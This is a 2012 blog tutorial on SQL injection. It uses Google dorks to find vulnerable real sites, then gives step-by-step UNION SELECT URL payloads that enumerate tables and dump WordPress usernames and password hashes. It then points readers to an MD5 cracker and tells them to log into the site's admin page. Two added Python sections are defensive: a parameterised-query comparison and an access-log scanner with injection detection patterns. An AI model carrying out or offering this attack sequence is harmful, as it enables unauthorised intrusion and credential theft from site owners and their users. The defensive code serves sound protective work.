Thursday 30 August 2012

SQL Injection Part 2 - Explained With An Example

In my previous article, SQL Injection Part 1, I explained how websites can be hacked using simple SQL injections. Today I will explain how websites can be hacked using advanced SQL injections. There are already a number of articles on different blogs about SQL injection, so I thought of writing this one around a worked example, to give you a better understanding.

In my previous article I covered all the basic SQL material; today I will go directly into the injection part. If you have not read the previous part, SQL Injection Part 1, kindly go through it before reading this one.


Finding Out A Vulnerable Website
We can use Google dorks to find vulnerable sites. If you want to look for an SQLi vulnerability on a particular website, you can also use Google dorks for that. All you need is a basic knowledge of advanced Google searching.

Here are some Google dorks:
inurl:article.php?ID=
inurl:newsDetail.php?id=
inurl:view.php?id=
inurl:page.php?id=
inurl:productdetail.php?id=

Now we have to check for the vulnerability. To do this, add a single quote (') at the end of the URL. If you get a database error or a blank page, the site is vulnerable to SQL injection: the quote has broken the SQL statement, which shows that the parameter is being placed into the query without escaping.

Here I found a vulnerable link on a website.


When I add a single quote at the end of the URL, some data on the page goes missing. Hence we can determine that it is vulnerable to SQL injection.



Finding Out The Number Of Columns
Now our job is to find out how many columns the page's query returns, because the UNION SELECT we use later must return the same number. We can find this by simply appending an "order by" clause at the end of the URL, as shown below.
www.vulnerablesite.com/view.php?id=47 order by 1-- (no error)
It should return the page with no error.
Now increase the column number by one. It looks like
www.vulnerablesite.com/view.php?id=47 order by 2-- (no error)
Keep increasing the count until you get an error. The error means there is no column at that position, so the query returns one column fewer than the number that failed.

In my example I got an error at the following query.
It means that the query returns 9 columns.



Finding Out The Most Vulnerable Column
When we are done with the number of columns, we need to find the most vulnerable column, i.e. the one whose value is actually rendered on the page. For this we use the following query.
www.vulnerablesite.com/view.php?id=47 union select 1,2,3,4,5,6,7,8,9--
The page should show the numbers of the columns that get rendered. Sometimes the numbers do not appear on your page. In such cases add '-' (without quotes) before your id number: the original WHERE clause then matches no existing row, so the page displays the row supplied by the UNION instead.

Then the above query looks like
www.vulnerablesite.com/view.php?id=-47 union select 1,2,3,4,5,6,7,8,9--

If you observe, I got 2 as the most vulnerable column. The most interesting part of our attack starts here: we need to extract the data from the database.


Finding Out The Table Names
First we will find out the table names in the database. Just use the following query to list them.
www.vulnerablesite.com/view.php?id=-47 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

It gives us a list of tables.


Now search for the tables you are interested in. A hacker generally looks for the tables that contain usernames and passwords. So select the table you want.


Finding Out The Column Names
Now we need to extract the column names from the table in order to extract its data. We can find the column names using the following query.
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='yourtablename'--

In my example the query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name='wp_users'--



It displays all the column names from the table 'wp_users'.



Extracting Data
Now we have to extract the information, such as usernames, passwords, etc.

We can do this with the following query, replacing yourcolumnname and yourtablename with a column and table found in the previous steps.
www.vulnerablesite.com/view.php?id=-47 union select 1,yourcolumnname,3,4,5,6,7,8,9 from yourtablename--
In my example this query becomes
www.vulnerablesite.com/view.php?id=-47 union select 1,user_login,3,4,5,6,7,8,9 from wp_users--
Similarly you can get the password column using the same query, by simply changing user_login to user_pass in my example.
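Everything above, the quote test, the ORDER BY count and the UNION reads of information_schema and wp_users, works for one reason: the id parameter is pasted into the SQL text. The blog shows no server-side code for view.php, so the following is an added example of mine, not the blog's, written in Python with sqlite3 standing in for the site's MySQL backend (sqlite_master plays the part of information_schema.tables, and the tables and rows are constructed). It puts the concatenating handler next to a hardened one that type-checks the id and binds it as a query parameter, then runs the article's own requests through both.

```python
import sqlite3

# Constructed sample database standing in for the site's MySQL backend.
# sqlite3 is used so the example runs offline; sqlite_master plays the role
# that information_schema.tables plays in the article's queries.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (47, 'Hello', 'first post')")
    db.execute("CREATE TABLE wp_users (id INTEGER, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', 'not-a-real-hash')")
    return db

def view_vulnerable(db, id_param):
    """Models view.php?id=...: the raw parameter is concatenated into the SQL
    text, so anything the client puts after the number becomes part of the
    statement (a quote breaks it, ORDER BY and UNION extend it)."""
    sql = "SELECT id, title, body FROM articles WHERE id=" + id_param
    return db.execute(sql).fetchall()

def view_safe(db, id_param):
    """Hardened version: validate the type, then pass the value as a bound
    parameter so the database never parses it as SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        return None  # non-numeric id: reject the request instead of guessing
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return db.execute(sql, (article_id,)).fetchall()

def probe(handler, db, id_param):
    """Call a handler the way the web server would and classify the outcome:
    ('rows', result) on success, ('error', message) on a database error."""
    try:
        return ("rows", handler(db, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# A plain valid id followed by the requests the article walks through,
# with the sqlite_master stand-in for information_schema.tables.
PROBES = [
    "47",
    "47'",
    "47 order by 10",
    "-47 union select 1,name,3 from sqlite_master",
]

if __name__ == "__main__":
    db = make_db()
    for p in PROBES:
        print(repr(p))
        print("  concatenated: ", probe(view_vulnerable, db, p))
        print("  parameterised:", probe(view_safe, db, p))
```

Run it directly to see each request classified for both handlers. The bound parameter is the important part: the database receives the SQL text and the value separately, so a quote, an ORDER BY or a UNION inside the value can never change the statement. Note also that the concatenating handler raises a database error on the quote; a site that prints that error into the page is exactly what makes the probe in the article informative, so database errors should be logged on the server and never rendered to the visitor.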

Many websites store passwords as MD5 hashes, so the value you get has to be cracked with an MD5 cracker. www.md5cracker.co.uk is an online service for cracking MD5 hashes. Then find the admin page and log in to the website.
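The sequence described in this article (a stray quote, a climbing ORDER BY, then UNION SELECT against information_schema) leaves a very recognisable trail in a web server's access log. As an added example that is not part of the original post, here is a small Python scanner that parses combined-format log lines, URL-decodes each query parameter and flags the requests matching those probes. The log lines, addresses and timestamps are constructed for the example; the assumption that the id parameter should always be an integer is specific to the page being protected and is set in NUMERIC_PARAMS.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample lines in combined log format. IPs, timestamps and sizes
# are invented; the request paths mirror the probes shown in the article.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Aug/2012:10:01:02 +0000] "GET /view.php?id=47 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2012:10:01:09 +0000] "GET /view.php?id=47%27 HTTP/1.1" 200 2011 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2012:10:01:20 +0000] "GET /view.php?id=47%20order%20by%2010-- HTTP/1.1" 500 311 "-" "Mozilla/5.0"
203.0.113.5 - - [30/Aug/2012:10:02:01 +0000] "GET /view.php?id=-47%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables-- HTTP/1.1" 200 7410 "-" "Mozilla/5.0"
198.51.100.9 - - [30/Aug/2012:10:03:00 +0000] "GET /view.php?id=48 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line that the scanner needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the probes the article describes, applied to the decoded
# parameter value (case-insensitive where keywords are involved).
SIGNATURES = [
    ("quote", re.compile(r"'")),
    ("order_by", re.compile(r"\border\s+by\b", re.I)),
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
]

# Parameters the application defines as integers (assumption for this page).
NUMERIC_PARAMS = {"id"}

def classify_param(name, value):
    """Return the signature labels that fire for one decoded parameter value."""
    reasons = [label for label, rx in SIGNATURES if rx.search(value)]
    if name in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        reasons.append("non_numeric_id")
    return reasons

def scan_log(text):
    """Parse each access-log line, decode its query string and report the
    requests whose parameters match an injection signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        target = urlparse(m.group("target"))
        params = parse_qs(target.query, keep_blank_values=True)
        reasons = []
        for name, values in params.items():
            for value in values:
                reasons.extend(classify_param(name, value))
        if reasons:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": target.path,
                "status": int(m.group("status")),
                "reasons": sorted(set(reasons)),
            })
    return findings

def summarize(findings):
    """Count flagged requests per client address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['time']} {f['path']} {f['status']} {','.join(f['reasons'])}")
    print("flagged requests per source:", summarize(found))
```

Two things worth noticing in the output: the UNION request that actually returns table names comes back with status 200, so filtering the log on 5xx responses alone would miss the step that matters, and the same source address produces the whole escalating sequence within a minute, which is the pattern to alert on. Literal signatures like these catch the probes exactly as the article types them; they are a detection aid, not a substitute for the parameterised query on the server side.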
